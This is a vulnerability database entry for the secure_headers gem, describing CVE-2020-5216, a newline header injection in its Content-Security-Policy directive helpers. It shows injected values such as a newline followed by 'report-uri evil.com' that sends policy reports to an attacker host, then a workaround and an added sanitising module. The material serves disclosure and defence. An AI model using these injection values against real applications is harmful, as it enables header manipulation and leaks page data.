Package details: pkg:gem/secure_headers@6.0.0.alpha01
purl pkg:gem/secure_headers@6.0.0.alpha01
Vulnerabilities affecting this package (0)

This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (1)

Vulnerability: VCID-mr8k-d23n-e3c6
Summary: secure_headers header injection due to newline
Aliases: CVE-2020-5216, GHSA-w978-rmpf-qmwg

If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected, leading to limited header injection. Upon seeing a newline in the header, Rails silently creates a new Content-Security-Policy header with the remaining value of the original string, and it continues to create a new header for each further newline. For example,

```ruby
override_content_security_policy_directives(script_src: ['mycdn.com', "\ninjected\n"])
```

would result in

```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

```ruby
override_content_security_policy_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
```

```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```

Workarounds

Strip newlines from any user-controlled value before passing it to the directive helpers:

```ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
```
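A guard for user-supplied source values before they reach append_/override_content_security_policy_directives, added here as an example; it is not part of the advisory or of the secure_headers gem, and the module name, the allowlist pattern and the controller usage are assumptions. It generalises the advisory's gsub workaround to carriage returns and adds a per-source allowlist, because removing line breaks only prevents header splitting and still lets a value carry other policy text into the directive.

```ruby
# Added example; not part of the advisory text or the secure_headers gem.
# Guards values destined for override_/append_content_security_policy_directives.
module CspSourceGuard
  # CR or LF inside a header value is what lets Rails start a new header.
  LINE_BREAK = /[\r\n]/

  # Shape of a single CSP source expression we are willing to accept: a quoted
  # keyword, a bare scheme, or a host-source (optional scheme, wildcard, port, path).
  # Constructed allowlist for this example; tighten it to your own deployment.
  SOURCE_TOKEN = %r{\A(?:
      '(?:self|none|unsafe-inline|unsafe-eval)'
    | [a-z][a-z0-9+.-]*:
    | (?:[a-z][a-z0-9+.-]*://)?(?:\*\.)?[a-z0-9-]+(?:\.[a-z0-9-]+)*(?::\d+)?(?:/[^\s;,]*)?
  )\z}ix

  # The advisory's workaround, generalised to CR as well as LF: replace line
  # breaks with spaces so the value cannot split the header; empty results are dropped.
  def self.strip_line_breaks(sources)
    Array(sources).map { |s| s.to_s.gsub(LINE_BREAK, " ").strip }.reject(&:empty?)
  end

  # True when a value could not be safely placed in a CSP source list as-is:
  # it either contains a line break or is not a single source expression.
  def self.suspicious?(value)
    value = value.to_s
    value.match?(LINE_BREAK) || !value.match?(SOURCE_TOKEN)
  end

  # Keeps only values that look like one CSP source expression; returns the
  # accepted list and the rejected values so the caller can log the latter.
  def self.filter(sources)
    Array(sources).map(&:to_s).partition { |s| !suspicious?(s) }
  end
end

# Hypothetical controller usage (assumes the secure_headers helper is available):
#   allowed, dropped = CspSourceGuard.filter(["mycdn.com", params[:cdn]])
#   Rails.logger.warn("dropped CSP sources: #{dropped.inspect}") if dropped.any?
#   override_content_security_policy_directives(script_src: allowed)
```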

History

Date: 2026-06-04T20:26:37.087814+00:00
Actor: GitLab Importer
Action: Fixing VCID-mr8k-d23n-e3c6
Source: https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/secure_headers/CVE-2020-5216.yml
VulnerableCode Version: 38.6.0